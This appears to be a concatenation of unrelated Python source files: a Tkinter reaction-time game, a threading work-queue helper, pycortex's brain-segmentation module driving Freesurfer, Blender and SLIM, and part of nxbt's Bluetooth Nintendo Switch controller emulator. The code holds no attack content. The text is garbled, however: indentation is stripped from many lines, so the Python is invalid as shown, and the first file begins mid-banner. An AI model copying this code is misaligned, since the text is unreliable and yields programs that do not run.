██║ ██║███████╗██║ ██║╚██████╗ ██║ ██║╚██████╔╝██║ ╚████║ ██║ ███████╗███████║ ██║
╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═╝ ╚══════╝╚══════╝ ╚═╝
"""
print('Credits to https://github.com/xtekky')
#defining a class
class Reactiontest:
#setting up GUI
def __init__(self):
self.window = Tk()
        self.window.geometry('1031x580') #window dimensions
        self.window.title("Reaction Time Test - Credits to Github xtekky") #window title
self.window.config(bg='#2b353f')
self.scores = []
self.react_ready = False
self.start_time = None
self.valid_round = True
self.round = 0
        # setting up a start button
self.start_button = Button(self.window, text='CLICK TO START', fg='#1E272E', bg='WHITE', font='Calibri 26 bold', bd=0, width=20, command= lambda: (self.start(), self.start_button.place_forget()))
self.start_button.place(relx=.340625, rely=.425)
# displaying GUI
self.window.mainloop()
#reset function if user clicks too early
def reset(self):
self.window.unbind("<Button-1>")
self.start_button.place(relx=.340625, rely=.425)
self.scores = []
self.round = 0
self.valid_round = True
#start function - when user presses start button
def _start(self):
sleep(randint(750, 2250) / 1000)
if self.valid_round:
self.window.config(bg='#576574')
self.start_time = time()
self.react_ready = True
def start(self):
if self.round != 1:
self.window.bind("<Button-1>", lambda event: self.register())
Thread(target=self._start).start()
else:
self.end()
# register function
def register(self):
if self.react_ready:
self.scores.append(time() - self.start_time)
self.window.config(bg='#1E272E')
self.react_ready = False
self.round += 1
self.start()
else:
self.valid_round = False
self.early()
# function if user clicks too early
def _early(self):
self.window.config(bg='#1E272E')
warning = Label(self.window, text="!", bg='white', fg='#1E272E', font='Calibri 60 bold', width=2)
warning.place(relx=.27, rely=.4)
early = Label(self.window, text="You clicked too early!\nRestarting in 1 second...", justify=LEFT, bg='#1E272E', fg='WHITE', font='Calibri 30 bold')
early.place(relx=.37, rely=.4)
sleep(1)
warning.place_forget()
early.place_forget()
self.reset()
def early(self):
        Thread(target=self._early).start()
#function to replay test when finished
def end(self):
score_items = []
        score_avg = Label(self.window, text=" ".join(f'REACTION TIME: {int((sum(self.scores) / len(self.scores)) * 1000)}ms'), bg='#1E272E', fg='WHITE', font='Calibri 24 bold')  # join() letter-spaces the text; len(self.scores) averages every recorded round
score_avg.place(relx=.25, rely=.35)
restart = Button(self.window, text="▶", bg='#1E272E', fg='WHITE', font='Calibri 30', height=1, bd=0, command=lambda: ([item.place_forget() for item in score_items], self.reset()))
restart.place(relx=.691, rely=.32)
score_items.extend((score_avg, restart))
self.window.unbind("<Button-1>")
#starting script
if __name__ == '__main__':
Reactiontest()
|
threads.py
|
from threading import *
import time
import atexit
class Threader(object):
    def __init__(self, threads, onSuccess=None, onError=None, actions=None):
        self.waitForWork = False
        self.threads = []
        self.threadCount = threads
        self.work = actions if actions is not None else []  # avoid sharing a mutable default list across instances
        self.errors = None
        self.onSuccess = onSuccess
        self.onError = onError
self.qlock = Lock()
self.xlock = Lock()
self.elock = Lock()
self.isKilled = False
def add(self,action):
with self.qlock:
self.work.append(action)
def start(self, waitForWork=False):
self.waitForWork = waitForWork
for tc in range(self.threadCount):
t = Thread(target=self._getWork)
t.start()
self.threads.append(t)
if not waitForWork:
self._join()
def finish(self):
self.waitForWork = False
self._join()
def kill(self):
self.work = []
self.isKilled = True
def _join(self):
for t in self.threads:
t.join()
def _nextWorkItem(self):
with self.qlock:
if len(self.work) > 0:
return self.work.pop(0)
if self.waitForWork:
time.sleep(.2)
return self._nextWorkItem()
return False
def _getWork(self):
w = self._nextWorkItem()
while w:
self._doWork(w)
w = self._nextWorkItem()
def _doWork(self,w):
try:
r = None
if isinstance(w,tuple):
r = w[0](**w[1])
else:
r = w()
            if self.onSuccess:
                with self.xlock:
                    if not self.isKilled:
                        self.onSuccess(r)
        except Exception as e:
if self.onError:
with self.elock:
self.onError(e)
if not self.errors:
self.errors = []
self.errors.append(str(e))
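# A minimal usage sketch (added for illustration; the worker and values are
# hypothetical). Work items may be plain callables or (callable, kwargs) tuples,
# as _doWork above shows:
# def job(n):
#     return n * n
# pool = Threader(threads=4,
#                 onSuccess=lambda r: print('done:', r),
#                 onError=lambda e: print('failed:', e),
#                 actions=[(job, {'n': i}) for i in (1, 2, 3)])
# pool.start()  # with waitForWork left False, start() joins until the queue drains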
|
segment.py
|
"""Controls functions for segmentation of white/gray matter and other things in the brain.
"""
import os
import time
import shlex
import warnings
import numpy as np
import subprocess as sp
from builtins import input
import multiprocessing as mp
from . import formats
from . import blender
from . import freesurfer
from . import options
from .database import db
from .freesurfer import autorecon as run_freesurfer_recon
from .freesurfer import import_subj as import_freesurfer_subject
slim_path = options.config.get('dependency_paths', 'slim')
def init_subject(subject, filenames, do_import_subject=False, **kwargs):
"""Run the first initial segmentation for a subject's anatomy (in Freesurfer).
This function creates a Freesurfer subject and runs autorecon-all,
then (optionally) imports the subject into the pycortex database.
NOTE: This function requires a functional Freesurfer install!
Also, still can't handle T2 weighted anatomical volume input. Please use
Freesurfer directly (and then import) for advanced recon-all input
options; this is just a convenience function.
Parameters
----------
subject : str
The name of the subject (this subject is created in the Freesurfer
SUBJECTS_DIR)
filenames : str or list
Freesurfer-compatible filename(s) for the anatomical image(s). This can
be the first dicom file of a series of dicoms, a nifti file, an mgz
file, etc.
do_import_subject : bool
        Whether to import the Freesurfer-processed subject (without further
        editing) into pycortex. False by default, since we recommend editing
(or at least inspecting) the brain mask and white matter segmentations
prior to importing into pycortex.
kwargs : keyword arguments passed to cortex.freesurfer.autorecon()
useful ones: parallel=True, n_cores=4 (or more, if you have them)
"""
if 'run_all' in kwargs:
warnings.warn('`run_all` is deprecated - please use do_import_subject keyword arg instead!')
do_import_subject = kwargs.pop('run_all')
if not isinstance(filenames, (list, tuple)):
filenames = [filenames]
filenames = ' '.join(['-i %s'%f for f in filenames])
cmd = "recon-all {fname} -s {subj}".format(subj=subject, fname=filenames)
print("Calling:\n%{}".format(cmd))
sp.call(shlex.split(cmd))
run_freesurfer_recon(subject, "all", **kwargs)
if do_import_subject:
import_freesurfer_subject(subject)
def edit_segmentation(subject,
volumes=('aseg.mgz', 'brainmask.mgz', 'wm.mgz'),
surfaces=('lh.smoothwm', 'rh.smoothwm', 'lh.pial', 'rh.pial'),
freesurfer_subject_dir=None):
"""Edit automatic segmentation results using freeview
Opens an instance of freeview with relevant files loaded.
Parameters
----------
subject : str
freesurfer subject identifier. Note that subject must be in your
SUBJECTS_DIR for freesurfer. If the environment variable SUBJECTS_DIR
is not set in your shell, then the location of the directory must be
specified in `freesurfer_subject_dir`.
volumes : tuple | list
Names of volumes to load in freeview
surfaces : tuple | list
Names of surfaces to load in freeview
freesurfer_subject_dir : str | None
Location of freesurfer subjects directory. If None, defaults to value
of SUBJECTS_DIR environment variable.
"""
if freesurfer_subject_dir is None:
freesurfer_subject_dir = os.environ['SUBJECTS_DIR']
cmaps = {'brain': 'grayscale',
'aseg': 'lut',
'brainmask': 'gray',
'wm': 'heat',
'smoothwm': 'yellow',
'white': 'green',
'pial': 'blue'
}
opacity={'brain': 1.0,
'aseg': 0.4,
'brainmask': 1.0,
'wm': 0.4,
}
vols = []
for v in volumes:
vpath = os.path.join(freesurfer_subject_dir, subject, 'mri', v)
vv, _ = os.path.splitext(v)
vextra = ':colormap={cm}:opacity={op:0.2f}'.format(cm=cmaps[vv], op=opacity[vv])
vols.append(vpath + vextra)
surfs = []
for s in surfaces:
spath = os.path.join(freesurfer_subject_dir, subject, 'surf', s)
_, ss = s.split('.')
sextra = ':edgecolor={col}'.format(col=cmaps[ss])
surfs.append(spath + sextra)
cmd = ["freeview", '-v'] + vols + ['-f'] + surfs
print("Calling: {}".format(' '.join(cmd)))
sp.call(cmd)
print("If you have edited the white matter surface, you should run:\n")
print(" `cortex.segment.run_freesurfer_recon('%s', 'wm')`\n"%subject)
print("If you have edited the brainmask (pial surface), you should run:\n")
print(" `cortex.segment.run_freesurfer_recon('%s', 'pia')`"%subject)
def cut_surface(cx_subject, hemi, name='flatten', fs_subject=None, data=None,
freesurfer_subject_dir=None, flatten_with='freesurfer',
do_import_subject=True, **kwargs):
"""Initializes an interface to cut the segmented surface for flatmapping.
This function creates or opens a blend file in your filestore which allows
surfaces to be cut along hand-defined seams. Blender will automatically
open the file. After edits are made, remember to save the file, then exit
Blender.
The surface will be automatically extracted from blender then run through
the mris_flatten command in freesurfer. The flatmap will be imported once
that command finishes if `do_import_subject` is True (default value).
Parameters
----------
cx_subject : str
Name of the subject to edit (pycortex subject ID)
hemi : str
Which hemisphere to flatten. Should be "lh" or "rh"
name : str, optional
String name of the current flatten attempt. Defaults to "flatten"
data : Dataview
A data view object to display on the surface as a cutting guide.
fs_subject : str
Name of Freesurfer subject (if different from pycortex subject)
None defaults to `cx_subject`
freesurfer_subject_dir : str
Name of Freesurfer subject directory. None defaults to SUBJECTS_DIR
        environment variable
flatten_with : str
'freesurfer' or 'SLIM' - 'freesurfer' (default) uses freesurfer's
`mris_flatten` function to flatten the cut surface. 'SLIM' uses
the SLIM algorithm, which takes much less time but tends to leave
more distortions in the flatmap. SLIM is an optional dependency, and
must be installed to work; clone the code
(https://github.com/MichaelRabinovich/Scalable-Locally-Injective-Mappings)
to your computer and set the slim dependency path in your pycortex config
file to point to </path/to/your/slim/install>/ReweightedARAP
do_import_subject : bool
set option to automatically import flatmaps when both are completed
(if set to false, you must import later with `cortex.freesurfer.import_flat()`)
"""
if fs_subject is None:
fs_subject = cx_subject
opts = "[hemi=%s,name=%s]"%(hemi, name)
fname = db.get_paths(cx_subject)['anats'].format(type='cutsurf', opts=opts, ext='blend')
# Double-check that fiducial and inflated vertex counts match
# (these may not match if a subject is initially imported from freesurfer to pycortex,
# and then edited further for a better segmentation and not re-imported)
ipt, ipoly, inrm = freesurfer.get_surf(fs_subject, hemi, 'inflated')
fpt, fpoly, fnrm = freesurfer.get_surf(fs_subject, hemi, 'fiducial')
if ipt.shape[0] != fpt.shape[0]:
raise ValueError("Please re-import subject - fiducial and inflated vertex counts don't match!")
else:
print('Vert check ok!')
if not os.path.exists(fname):
blender.fs_cut(fname, fs_subject, hemi, freesurfer_subject_dir)
# Add localizer data to facilitate cutting
if data is not None:
blender.add_cutdata(fname, data, name=data.description)
blender_cmd = options.config.get('dependency_paths', 'blender')
sp.call([blender_cmd, fname])
patchpath = freesurfer.get_paths(fs_subject, hemi,
freesurfer_subject_dir=freesurfer_subject_dir)
patchpath = patchpath.format(name=name)
blender.write_patch(fname, patchpath)
if flatten_with == 'freesurfer':
done = freesurfer.flatten(fs_subject, hemi, patch=name,
freesurfer_subject_dir=freesurfer_subject_dir,
**kwargs)
if not done:
# If flattening is aborted, skip the rest of this function
# (Do not attempt to import completed flatmaps)
return
if do_import_subject:
# Check to see if both hemispheres have been flattened
other = freesurfer.get_paths(fs_subject, "lh" if hemi == "rh" else "rh",
freesurfer_subject_dir=freesurfer_subject_dir)
other = other.format(name=name+".flat")
# If so, go ahead and import subject
if os.path.exists(other):
freesurfer.import_flat(fs_subject, name, sname=cx_subject,
flat_type='freesurfer',
freesurfer_subject_dir=freesurfer_subject_dir)
elif flatten_with == 'SLIM':
done = flatten_slim(fs_subject, hemi, patch=name,
freesurfer_subject_dir=freesurfer_subject_dir,
**kwargs)
if not done:
# If flattening is aborted, skip the rest of this function
# (Do not attempt to import completed flatmaps)
return
if do_import_subject:
other = freesurfer.get_paths(fs_subject, "lh" if hemi == "rh" else "rh",
type='slim',
freesurfer_subject_dir=freesurfer_subject_dir)
other = other.format(name=name)
# If so, go ahead and import subject
if os.path.exists(other):
freesurfer.import_flat(fs_subject, name, sname=cx_subject,
flat_type='slim',
freesurfer_subject_dir=freesurfer_subject_dir)
return
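# A minimal usage sketch (added for illustration; the subject name is hypothetical).
# Cut and flatten each hemisphere in turn; with do_import_subject=True the flatmap
# is only imported once patches for both hemispheres exist:
# import cortex
# cortex.segment.cut_surface('S1', 'lh', name='flatten', flatten_with='freesurfer')
# cortex.segment.cut_surface('S1', 'rh', name='flatten', flatten_with='freesurfer')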
def flatten_slim(subject, hemi, patch, n_iterations=20, freesurfer_subject_dir=None,
slim_path=slim_path, do_flatten=None):
"""Flatten brain w/ slim object flattening
Parameters
----------
subject : str
freesurfer subject
hemi : str
'lh' or 'rh' for left or right hemisphere
patch : str
name of patch, often "flatten" (obj file used here is {hemi}_{patch}.obj
in the subject's freesurfer directory)
freesurfer_subject_dir : str
        path to freesurfer subject dir. Defaults to environment variable
SUBJECTS_DIR
slim_path : str
path to SLIM flattening. Defaults to path specified in config file.
"""
if slim_path == 'None':
slim_url = 'https://github.com/MichaelRabinovich/Scalable-Locally-Injective-Mappings'
raise ValueError("Please download SLIM ({slim_url}) and set the path to it in the `slim` field\n"
"in the `[dependency_paths]` section of your config file ({usercfg}) \n"
"if you wish to use slim!".format(slim_url=slim_url, usercfg=options.usercfg))
if do_flatten is None:
resp = input('Flattening with SLIM will take a few mins. Continue? (type y or n and press return)')
do_flatten = resp.lower() in ('y', 'yes')
if not do_flatten:
print("Not flattening...")
return
# File paths
if freesurfer_subject_dir is None:
freesurfer_subject_dir = os.environ['SUBJECTS_DIR']
patchpath = freesurfer.get_paths(subject, hemi,
freesurfer_subject_dir=freesurfer_subject_dir)
patchpath = patchpath.format(name=patch)
obj_in = patchpath.replace('.patch.3d', '.obj')
obj_out = obj_in.replace('.obj', '_slim.obj')
# Load freesurfer surface exported from blender
pts, polys, _ = freesurfer.get_surf(subject, hemi, "patch", patch=patch, freesurfer_subject_dir=freesurfer_subject_dir)
# Cull pts that are not in manifold
pi = np.arange(len(pts))
pii = np.in1d(pi, polys.flatten())
idx = np.nonzero(pii)[0]
pts_new = pts[idx]
# Match indices in polys to new index for pts
polys_new = np.vstack([np.searchsorted(idx, p) for p in polys.T]).T
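    # (added note) searchsorted maps old vertex ids onto the compacted array:
    # e.g. with idx = [2, 5, 9], a triangle [2, 9, 5] becomes [0, 2, 1].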
# save out obj file
print("Writing input to SLIM: %s"%obj_in)
formats.write_obj(obj_in, pts_new, polys_new)
# Call slim to write new obj file
print('Flattening with SLIM (will take a few minutes)...')
slim_cmd = [slim_path, obj_in, obj_out, str(n_iterations)]
print('Calling: {}'.format(' '.join(slim_cmd)))
out = sp.check_output(slim_cmd)
print("SLIM code wrote %s"%obj_out)
# Load resulting obj file
_, _, _, uv = formats.read_obj(obj_out, uv=True)
uv = np.array(uv)
# Re-center UV & scale to match scale of inflated brain. It is necessary
# to re-scale the uv coordinates generated by SLIM, since they have
# arbitrary units that don't match the scale of the inflated /
# fiducial brains.
uv -= uv.min(0)
uv /= uv.max()
uv -= (uv.max(0) / 2)
infl_scale = np.max(np.abs(pts_new.min(0)-pts_new.max(0)))
# This is a magic number based on the approximate scale of the flatmap
# (created by freesurfer) to the inflated map in a couple other subjects.
# For two hemispheres in two other subjects, it ranged from 1.37 to 1.5.
# There doesn't seem to be a principled way to set this number, since the
# flatmap is stretched and distorted anyway, and that stretch varies by
    # subject and by hemisphere. Note, though, that this doesn't change
# distortions, just the overall scale of the thing. So here we are.
# ML 2018.07.05
extra_scale = 1.4
uv *= (infl_scale * extra_scale)
# put back polys, etc that were missing
pts_flat = pts.copy()
pts_flat[idx, :2] = uv
# Set z coords for the manifold vertices to 0
pts_flat[idx, 2] = 0
# Re-set scale for non-manifold vertices
nz = pts_flat[:, 2] != 0
pts_flat[nz, 2] -= np.mean(pts_flat[nz, 2])
    # Mirror the right hemisphere so left/right flatmaps face consistently
    if hemi == 'rh':
        pts_flat[:, 1] = -pts_flat[:, 1]  # flip Y axis
        pts_flat[:, 0] = -pts_flat[:, 0]  # flip X axis
# Modify output .obj file to reflect flattening
#surfpath = os.path.join(freesurfer_subject_dir, subject, "surf", "flat_{hemi}.gii")
#fname = surfpath.format(hemi=hemi)
#print("Writing %s"%fname)
formats.write_obj(obj_out.replace('_slim','.flat_slim'), pts=pts_flat, polys=polys)
return
def show_surface(subject, hemi, surface_type, patch=None, flatten_step=None, freesurfer_subject_dir=None):
"""
Parameters
----------
subject: str
freesurfer subject name
hemi: str
'lh' or 'rh' for left hemisphere or right hemisphere
surface_type : str
type of surface to show, e.g. 'patch', 'surf', etc if 'patch',
patch name must be specified in patch kwarg
patch: str
name of patch, e.g. 'flatten.flat', 'flatten2.flat', etc
"""
meshlab_path = options.config.get('dependency_paths', 'meshlab')
if meshlab_path == 'None':
try:
# exists in system but not available in config
            meshlab_path = sp.check_output('command -v meshlab', shell=True).strip().decode()  # decode: check_output returns bytes
warnings.warn('Using system meshlab: %s'%meshlab_path)
except sp.CalledProcessError:
raise ValueError('You must have installed meshlab to call this function.')
if freesurfer_subject_dir is None:
freesurfer_subject_dir = os.environ['SUBJECTS_DIR']
if surface_type in ('inflated', 'fiducial'):
input_type = 'surf'
else:
input_type = surface_type
fpath = freesurfer.get_paths(subject, hemi, input_type,
freesurfer_subject_dir=freesurfer_subject_dir)
    if 'obj' not in fpath:
pts, polys, curv = freesurfer.get_surf(subject, hemi, surface_type,
patch=patch,
flatten_step=flatten_step,
freesurfer_subject_dir=freesurfer_subject_dir)
# TODO: use tempfile library here
objf = '/tmp/temp_surf.obj'
formats.write_obj(objf, pts, polys)
else:
objf = fpath.format(name=patch)
# Call meshlab to display surface
out = sp.check_output([meshlab_path, objf])
### DEPRECATED ###
def fix_wm(subject):
"""Initializes an interface to make white matter edits to the surface.
This will open two windows -- a tkmedit window that makes the actual edits,
as well as a mayavi window to display the surface. Clicking on the mayavi window
will drop markers which can be loaded using the "Goto Save Point" button in tkmedit.
If you wish to load the other hemisphere, simply close the mayavi window and the
other hemisphere will pop up. Mayavi will stop popping up once the tkmedit window
is closed.
Once the tkmedit window is closed, a variety of autorecon options are available.
When autorecon finishes, the new surfaces are immediately imported into the pycortex
database.
Parameters
----------
subject : str
Name of the subject to edit
"""
warnings.warn("Deprecated! We recommend using edit_segmentation() and rerun_recon() instead of fix_wm() and fix_pia().")
status = _cycle_surf(subject, "smoothwm")
cmd = "tkmedit {subj} wm.mgz lh.smoothwm -aux brainmask.mgz -aux-surface rh.smoothwm"
sp.call(shlex.split(cmd.format(subj=subject)))
status.value = 0
resp = input("1) Run autorecon-wm?\n2) Run autorecon-cp?\n3) Do nothing?\n (Choose 1, 2, or 3)")
if resp == "1":
freesurfer.autorecon(subject, "wm")
elif resp == "2":
freesurfer.autorecon(subject, "cp")
elif resp == "3":
print("Doing nothing...")
return
import_freesurfer_subject(subject)
def fix_pia(subject):
"""Initializes an interface to make pial surface edits.
    This function will open two windows -- a tkmedit window that makes the actual edits,
as well as a mayavi window to display the surface. Clicking on the mayavi window
will drop markers which can be loaded using the "Goto Save Point" button in tkmedit.
If you wish to load the other hemisphere, simply close the mayavi window and the
other hemisphere will pop up. Mayavi will stop popping up once the tkmedit window
is closed.
Once the tkmedit window is closed, a variety of autorecon options are available.
When autorecon finishes, the new surfaces are immediately imported into the pycortex
database.
Parameters
----------
subject : str
Name of the subject to edit
"""
warnings.warn("Deprecated! We recommend using edit_segmentation() and rerun_recon() instead of fix_wm() and fix_pia().")
status = _cycle_surf(subject, "pial")
cmd = "tkmedit {subj} brainmask.mgz lh.smoothwm -aux T1.mgz -aux-surface rh.smoothwm"
sp.call(shlex.split(cmd.format(subj=subject)))
status.value = 0
resp = input("1) Run autorecon-pia?\n2) Run autorecon-wm?\n3) Do nothing?\n (Choose 1, 2, or 3)")
if resp == "1":
freesurfer.autorecon(subject, "pia")
elif resp == "2":
freesurfer.autorecon(subject, "wm")
elif resp == "3":
print("Doing nothing...")
return
import_freesurfer_subject(subject)
def _cycle_surf(subject, surf):
status = mp.Value('b', 1)
def cycle_surf():
idx, hemis = 0, ['lh', 'rh']
while status.value > 0:
hemi = hemis[idx%len(hemis)]
idx += 1
#HELLISH CODE FOLLOWS, I heavily apologize for this awful code
#In order for this to work well, mayavi has to block until you close the window
#Unfortunately, with IPython's event hook, mlab.show does not block anymore
#There is no way to force mayavi to block, and hooking directly into backend vtk objects cause it to crash out
#Thus, the only safe way is to call python using subprocess
cmd = "python -m cortex.freesurfer {subj} {hemi} {surf}"
sp.call(shlex.split(cmd.format(subj=subject, hemi=hemi, surf=surf)))
proc = mp.Process(target=cycle_surf)
proc.start()
return status
|
nxbt.py
|
from multiprocessing import Process, Lock, Queue, Manager
import queue
from enum import Enum
import atexit
import signal
import os
import sys
import time
import json
import dbus
from .controller import ControllerServer
from .controller import ControllerTypes
from .bluez import BlueZ, find_objects, toggle_clean_bluez
from .bluez import replace_mac_addresses
from .bluez import find_devices_by_alias
from .bluez import SERVICE_NAME, ADAPTER_INTERFACE
from .logging import create_logger
JOYCON_L = ControllerTypes.JOYCON_L
JOYCON_R = ControllerTypes.JOYCON_R
PRO_CONTROLLER = ControllerTypes.PRO_CONTROLLER
DIRECT_INPUT_PACKET = {
# Sticks
"L_STICK": {
"PRESSED": False,
"X_VALUE": 0,
"Y_VALUE": 0,
# Keyboard position calculation values
"LS_UP": False,
"LS_LEFT": False,
"LS_RIGHT": False,
"LS_DOWN": False
},
"R_STICK": {
"PRESSED": False,
"X_VALUE": 0,
"Y_VALUE": 0,
# Keyboard position calculation values
"RS_UP": False,
"RS_LEFT": False,
"RS_RIGHT": False,
"RS_DOWN": False
},
# Dpad
"DPAD_UP": False,
"DPAD_LEFT": False,
"DPAD_RIGHT": False,
"DPAD_DOWN": False,
# Triggers
"L": False,
"ZL": False,
"R": False,
"ZR": False,
# Joy-Con Specific Buttons
"JCL_SR": False,
"JCL_SL": False,
"JCR_SR": False,
"JCR_SL": False,
# Meta buttons
"PLUS": False,
"MINUS": False,
"HOME": False,
"CAPTURE": False,
# Buttons
"Y": False,
"X": False,
"B": False,
"A": False
}
class Buttons():
"""The button object containing the button string constants.
"""
Y = 'Y'
X = 'X'
B = 'B'
A = 'A'
JCL_SR = 'JCL_SR'
JCL_SL = 'JCL_SL'
R = 'R'
ZR = 'ZR'
MINUS = 'MINUS'
PLUS = 'PLUS'
R_STICK_PRESS = 'R_STICK_PRESS'
L_STICK_PRESS = 'L_STICK_PRESS'
HOME = 'HOME'
CAPTURE = 'CAPTURE'
DPAD_DOWN = 'DPAD_DOWN'
DPAD_UP = 'DPAD_UP'
DPAD_RIGHT = 'DPAD_RIGHT'
DPAD_LEFT = 'DPAD_LEFT'
JCR_SR = 'JCR_SR'
JCR_SL = 'JCR_SL'
L = 'L'
ZL = 'ZL'
class Sticks():
"""The sticks object containing the joystick string constants.
"""
RIGHT_STICK = "R_STICK"
LEFT_STICK = "L_STICK"
class NxbtCommands(Enum):
"""An enumeration containing the nxbt message
commands.
"""
CREATE_CONTROLLER = 0
INPUT_MACRO = 1
STOP_MACRO = 2
CLEAR_MACROS = 3
CLEAR_ALL_MACROS = 4
REMOVE_CONTROLLER = 5
QUIT = 6
class Nxbt():
"""The nxbt object implements the core multiprocessing logic
    and message passing API that acts as the heart of the application.
    Upon creation, a multiprocessing Process is spun off to act as the
manager for all emulated Nintendo Switch controllers. Messages
are passed into a queue which is consumed and acted upon by the
_command_manager.
All function calls that interact or control the emulated controllers
are simply message constructors that submit to the central task_queue.
This allows for thread-safe control of emulated controllers.
"""
def __init__(self, debug=False, log_to_file=False, disable_logging=False):
"""Initializes the necessary multiprocessing resources and starts
the multiprocessing processes.
:param debug: Enables the debugging functionality of
nxbt, defaults to False
:type debug: bool, optional
        :param log_to_file: A boolean value that indicates whether or not
a log should be saved to the current working directory, defaults to False
:type log_to_file: bool, optional
:param disable_logging: Routes all logging calls to a null log handler.
:type disable_logging: bool, optional, defaults to False.
"""
self.debug = debug
self.logger = create_logger(
debug=self.debug, log_to_file=log_to_file, disable_logging=disable_logging)
        # Main queue for nxbt tasks
self.task_queue = Queue()
        # Synchronizes bluetooth actions
self._bluetooth_lock = Lock()
# Creates/manages shared resources
self.resource_manager = Manager()
# Shared dictionary for viewing overall nxbt state.
        # Should be treated as read-only except by
# the main nxbt multiprocessing process.
self.manager_state = self.resource_manager.dict()
self.manager_state_lock = Lock()
# Shared, controller management properties.
        # The controller lock is used to synchronize use.
self._controller_lock = Lock()
self._controller_counter = 0
self._adapters_in_use = {}
self._controller_adapter_lookup = {}
# Disable the BlueZ input plugin so we can use the
# HID control/interrupt Bluetooth ports
toggle_clean_bluez(True)
# Exit handler
atexit.register(self._on_exit)
# Starting the nxbt worker process
self.controllers = Process(
target=self._command_manager,
args=((self.task_queue), (self.manager_state)))
# Disabling daemonization since we need to spawn
# other controller processes, however, this means
        # we need to clean up on exit.
self.controllers.daemon = False
self.controllers.start()
def _on_exit(self):
"""The exit handler function used with the atexit module.
This function attempts to gracefully exit by terminating
all spun up multiprocessing Processes. This is done to
ensure no zombie processes linger after exit.
"""
# Need to explicitly kill the controllers process
# since it isn't daemonized.
if hasattr(self, "controllers") and self.controllers.is_alive():
self.controllers.terminate()
self.resource_manager.shutdown()
# Re-enable the BlueZ plugins, if we have permission
toggle_clean_bluez(False)
def _command_manager(self, task_queue, state):
"""Used as the main multiprocessing Process that is launched
on startup to handle the message passing and instantiation of
the controllers. Messages are pulled out of a Queue and passed
as appropriately phrased function calls to the ControllerManager.
:param task_queue: A multiprocessing Queue used as the source
of messages
:type task_queue: multiprocessing.Queue
:param state: A dict used to store the shared state of the
emulated controllers.
:type state: multiprocessing.Manager().dict
"""
cm = _ControllerManager(state, self._bluetooth_lock)
# Ensure a SystemExit exception is raised on SIGTERM
# so that we can gracefully shutdown.
        signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(0))  # signal handlers receive (signum, frame)
try:
while True:
try:
msg = task_queue.get(timeout=5)
except queue.Empty:
msg = None
if msg:
if msg["command"] == NxbtCommands.CREATE_CONTROLLER:
cm.create_controller(
msg["arguments"]["controller_index"],
msg["arguments"]["controller_type"],
msg["arguments"]["adapter_path"],
msg["arguments"]["colour_body"],
msg["arguments"]["colour_buttons"],
msg["arguments"]["reconnect_address"])
elif msg["command"] == NxbtCommands.INPUT_MACRO:
cm.input_macro(
msg["arguments"]["controller_index"],
msg["arguments"]["macro"],
msg["arguments"]["macro_id"])
elif msg["command"] == NxbtCommands.STOP_MACRO:
cm.stop_macro(
msg["arguments"]["controller_index"],
msg["arguments"]["macro_id"])
elif msg["command"] == NxbtCommands.CLEAR_MACROS:
cm.clear_macros(
msg["arguments"]["controller_index"])
elif msg["command"] == NxbtCommands.REMOVE_CONTROLLER:
index = msg["arguments"]["controller_index"]
cm.clear_macros(index)
cm.remove_controller(index)
finally:
cm.shutdown()
sys.exit(0)
def macro(self, controller_index, macro, block=True):
"""Used to input a given macro on a specified controller.
This is done by creating and passing an INPUT_MACRO
message into the task queue with the given macro.
If block is set to True, this function waits until the
macro_id (generated on the submission of the macro)
shows up under the "finished_macros" list communicated
under the controllers shared state.
:param controller_index: The index of a given controller
:type controller_index: int
:param macro: The series of button presses and timings
to be passed to the controller
:type macro: string
:param block: A boolean variable indicating whether or not
to block until the macro completes, defaults to True
:type block: bool, optional
:raises ValueError: If the controller_index does not exist
:return: The generated ID of the passed macro. This ID
will show up under the "finished_macros" list communicated
in the controllers shared state.
:rtype: str
"""
if controller_index not in self.manager_state.keys():
raise ValueError("Specified controller does not exist")
# Get a unique ID to identify the macro
# so we can check when the controller is done inputting it
macro_id = os.urandom(24).hex()
self.task_queue.put({
"command": NxbtCommands.INPUT_MACRO,
"arguments": {
"controller_index": controller_index,
"macro": macro,
"macro_id": macro_id,
}
})
if block:
while True:
finished = (self.manager_state
[controller_index]["finished_macros"])
if macro_id in finished:
break
time.sleep(1/120) # Wait one Pro Controller cycle
return macro_id
def press_buttons(self, controller_index, buttons, down=0.1, up=0.1, block=True):
"""Used to press a given set of buttons on the controller for a
specified up and down duration. This is done by inputting a macro
configured with the specified button presses and timings.
:param controller_index: The index of a given controller
:type controller_index: int
:param buttons: A list of nxbt.Buttons
:type buttons: list
:param down: How long to hold the buttons down for
in seconds, defaults to 0.1
:type down: float, optional
:param up: How long to release the button for
in seconds, defaults to 0.1
:type up: float, optional
:param block: A boolean variable indicating whether or not
to block until the macro completes, defaults to True
:type block: bool, optional
:return: The generated ID of the passed macro. This ID
will show up under the "finished_macros" list communicated
in the controllers shared state.
:rtype: str
"""
macro_buttons = " ".join(buttons)
macro_times = f"{down}s \n{up}s"
macro = macro_buttons + " " + macro_times
macro_id = self.macro(controller_index, macro, block=block)
return macro_id
def tilt_stick(self, controller_index, stick, x, y,
tilted=0.1, released=0.1, block=True):
"""Used to tilt a given stick on the controller for a
specified tilted and released duration. This is done by
inputting a macro configured with the specified stick tilts
and timings.
:param controller_index: The index of a given controller
:type controller_index: int
:param stick: The right or left nxbt.Stick
:type stick: nxbt.Stick
:param x: The positive or negative X-Axis of the stick on
a 0 to 100 scale
:type x: int
:param y: The positive or negative Y-Axis of the stick on
a 0 to 100 scale
:type y: int
:param tilted: The time the stick should remain tilted
for, defaults to 0.1
:type tilted: float, optional
:param released: The time the stick should remain
released for, defaults to 0.1
:type released: float, optional
:type block: bool, optional
:return: The generated ID of the passed macro. This ID
will show up under the "finished_macros" list communicated
in the controllers shared state.
:rtype: str
"""
if controller_index not in self.manager_state.keys():
raise ValueError("Specified controller does not exist")
if x >= 0:
x_parsed = f'+{x:03}'
else:
x_parsed = f'{x:04}'
if y >= 0:
y_parsed = f'+{y:03}'
else:
y_parsed = f'{y:04}'
macro = f'{stick}@{x_parsed}{y_parsed} {tilted}s\n{released}s'
macro_id = self.macro(controller_index, macro, block=block)
return macro_id
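    # (added note) Both helpers above compile down to nxbt's plain-text macro
    # format. Following the f-strings in the two methods, for example:
    #   press_buttons(i, [Buttons.A, Buttons.B]) submits "A B 0.1s \n0.1s"
    #   tilt_stick(i, Sticks.LEFT_STICK, 50, -50) submits "L_STICK@+050-050 0.1s\n0.1s"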
